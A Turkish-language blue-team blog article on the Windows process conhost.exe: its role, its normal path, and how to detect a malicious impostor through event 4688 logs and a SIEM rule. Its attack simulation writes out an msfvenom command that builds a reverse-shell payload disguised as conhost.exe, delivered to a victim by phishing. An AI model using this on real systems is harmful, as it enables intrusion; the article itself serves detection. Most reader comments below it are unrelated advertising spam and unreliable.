Siber Güvenlik

Blue Team Bakış Açısıyla Windows Sistem Processleri 2: conhost.exe

Bilgisayarımızda beklenmedik yavaşlık, donma veya ısınma sorunları oluştuğunda hepimizin ilk baktığı yer olan görev yöneticisi çeşitli işlemlere ev sahipliği yapmaktadır. Görev yöneticisi; yürütülen işlemler, kullanılan işlemci ve hafıza oranları gibi bizlere çeşitli bilgiler vermektedir: Bu işlemler kim tarafından yapılıyor? Bilgisayarımda virüs, madencilik zararlısı var mı ? Hangi işlemler, servisler paket aktarımı gerçekleştiriyor ?

Mehmet Selim Kartal |

28.04.2021

Görev yöneticisinde bulunan işlemler, işletim sistemi kullanıcıları olan bizler tarafından başlatılabildiği gibi Windows işletim sisteminin kendi görevlerini yapabilmesi, işletim sisteminin ayakta durabilmesi veya kullanıcının yapmak istediği işlemleri yerine getirebilmesi için Windows’un kendisi tarafından farklı farklı işlemler ve servisler de başlatılmaktadır. Peki biz görev yöneticisi ekranında bulunan aktif işlemler hakkında ne kadar bilgi sahibiyiz?

Bu yazımızda, Microsoft tarafından imzalı, Windows’un resmi işlemlerinden biri olan “conhost.exe” dosyasının ne için kullanıldığı ve saldırganlar tarafından kullanılıp kullanılmadığını anlayabilmemiz için ne yapmamız gerektiğini ele alacağız.

Conhost.exe dosyasının görevlerini irdelemeden önce hakkında genel bilgi verelim. Conhost.exe dosyasının tam ismi “Console windows host” olup “Konsol pencereleri ana-bilgisayarı” olarak Türkçeleştirebiliriz. Microsoft tarafından imzalıdır ve varsayılan dosya dizini SystemRoot%\System32\conhost.exe ( Not: %SystemRoot% = C:\Windows\ )

olarak belirlenmiştir. Sistemde çalışan ve komut satırı üzerinde işlem yapan her bir uygulama için bir tane çalışırken yetki seviyesi uygulamanın çalıştığı yetki seviyesi ile aynı bulunmaktadır.  

 

conhost_exe_2

 

Örnek verecek olursak Nvidia, MSI dragon center ve MySQL gibi arka planda komut satırı üzerinde işlem yapan uygulamaların her biri için ayrı bir “conhost.exe” çalışmaktadır ve her biri ayrı yetki gerektirdiği için farklı yetkilerle, kullanıcılarla çalışmaktadır.

conhost_exe_2

 

Conhost.exe’nin temel görevi siyah konsol ekranını monitöre çizmektir. İlk olarak Windows7 ile beraber kişisel bilgisayar kullanıcılarıyla buluşmuştur. Windows7’yle birlikte Windows8 ve Windows10 işletim sistemlerinde de bulunmaktadır. Daha önceki Windows sürümlerinde “csrss.exe” dosyası tarafından bu görev üstlenilmekteydi ancak önceki yazımızda da belirttiğimiz gibi “csrss.exe” dosyasının sistem seviyesinde çalışıyor oluşu ciddi güvenlik zafiyetlerine yol açmasına ek olarak yeni Windows versiyonlarıyla gelen yazı tipi ve tema değişikliği sırasında sistem çökmelerine de yol açıyordu.

 

conhost_exe_3

 

Bu sebeplerden dolayı konsol ekranının monitöre çizilmesi veya üçüncü parti uygulamalar tarafından kullanılması gerektiğinde aradaki köprü olma vazifesini üstlenmiştir. Bu sayede ciddi sistemsel sorunlara yol açmadan istenilen değişiklikleri yapılmasına fırsat vermektedir.

 

Ek olarak, komut satırına dosyaları sürükle-bırak özelliği katmıştır.

conhostt_exe

 

Zararlı conhost.exe işleminin tespiti:

Yazının bu bölümünde conhost.exe dosyasının saldırganlar tarafından nasıl kullanılabildiğine dair bir atak simülasyonuna yer vereceğiz. Bu simülasyonda saldırgan; kurbanına bir oltalama e-postası göndermiş, içerisinde kendi sunucusunda bulunan zararlı conhost.exe dosyasını indirmeye yarayacak betik yerleştirmiştir.

C2 Sunucusu : 192.168.136.138 

Kurban makinesi: 192.168.136.139

Zararlı bulaştıktan sonra C2 sunucumuzla konuşabilmesi için handler oluşturuyoruz ve gerekli ayarları giriyoruz.

Msfvenom -p windows/x64/reverse_tcp --arch x64 --platform windows LHOST = <IP> LPORT = <PORT> -f exe -o conhost.exe

conhost_exe_5

Zararlı bulaştıktan sonra C2 sunucumuzla konuşabilmesi için handler oluşturuyoruz ve gerekli ayarları giriyoruz.

conhost_exe_6

 

Kurbana yollanılan oltalama e-postasında bulunan zararlı linke tıkladığında bilgisayarına indirilen conhost.exe dosyası çalıştırıldığında başarıya ulaştığımızı görüyoruz.

 

conhost_exe_7conhost_exe_7

 

Zararlı conhost.exe dosyası çalışmasıyla birlikte dosyanın detaylı özelliklerine bakabiliriz.

 

conhost_exe_9

 

Process Explorer

conhost_exe_10

 

4688 Event logları

conhost_exe_11

Zararlı conhost.exe dosyasının çalışmaya başlamasıyla oluşan 4688 Event ID’li Windows güvenlik loglarında ise log detayında bulunan “Process name” verisi bu işlemin legal olup olmadığıyla ilgili kanıt sunuyor.

SIEM kuralı örneği ile de bu teknikle gerçekleştirilen bir atağın tespiti yapılabilir. Bu kural diğer Windows sistem işlemlerinin kontrolü için de uygulanabilir.

& AND
Windows Security Log Event ID = 4688
Process Name contains conhost.exe
∥ OR
Image Path != “C:\Windows\System32\”

Mehmet Selim Kartal |

28.04.2021

Yorumlar

Yusuf Can Çakır
29.04.2021 - 06:30

Ellerinize sağlık hocam, güzel bir yazı olmuş.

Sahil Rzayev
02.05.2021 - 04:35

Elinize sağlık hocam.Gerçekten faydalı bir yazı olmuş

Teknobilim adamı
03.05.2021 - 04:54

Aynı işlemleri metasploit aracıyla da yapamaz mıydık ? Yada Windows Powershell kullanarak. 

Teşekkür ederim. Bunu teknoloji haberlerinde gündeme getirebilirim.

Engin Can Çiftçi
27.05.2021 - 02:09

Faydalı bir içerik olmuş, bilgi ve konular için teşekkürler! 

Ali Esen
30.05.2021 - 05:33

Çok güzel ve detaylı bir yazı olmuş, psikolog yazısı gibi...

Turizme Bakış
30.05.2021 - 06:26

Muhteşem bir içerik olmuş. Turizm sektörünün dijitalleşmesi noktasında da bu tür çalışmaların yapılması gerekiyor. Çok teşekkürler

Cathy M. Scherer
01.06.2021 - 07:18

The system looks really good with all those improvements. Look at credit repair orlando for some advise.

william pulley
12.06.2021 - 05:50

any update on Blue Team Bakış Açısıyla Windows Sistem Processleri 2: conhost.exe? 
is it still working for the new updates?
roofing companies charlotte harbor fl

Julia cohen
01.07.2021 - 08:39

thanks for sharing this I recommend it my friends. any update for this? 

credit repair melbourne

Esha Fatima
10.07.2021 - 04:26

Windows System Processes from a Blue Team Perspective 2: conhost.exe is a very interesting and authentic topic for all to taking interest in the new generation windows system but there are also very energetic and authentic services available like the most effective essay help online which are giving their best and valuable services in all over Pakistan.

Jane Jones
14.07.2021 - 06:20

Those smart ideas in addition worked as the easy way to recognize that other people have a similar desire the same as my own to know much more when it comes to this condition. https://www.carrysmartmoving.com

Hemis_love
19.07.2021 - 07:47

From the footing to the roof stucco repair cost, I'd probably put three poles on each end and in the middle, and then hang beams in between them. You might use an 8 by 8 grid. More than you need, however it makes it simple to attach other materials.

See more here:
https://www.stuccoprosmelbournefl.com

 

Robert James
28.07.2021 - 07:34

Great! This is very useful for those people who are struggling with their task management. I will recommend this to my team in www.anchoragekitchenremodeling.com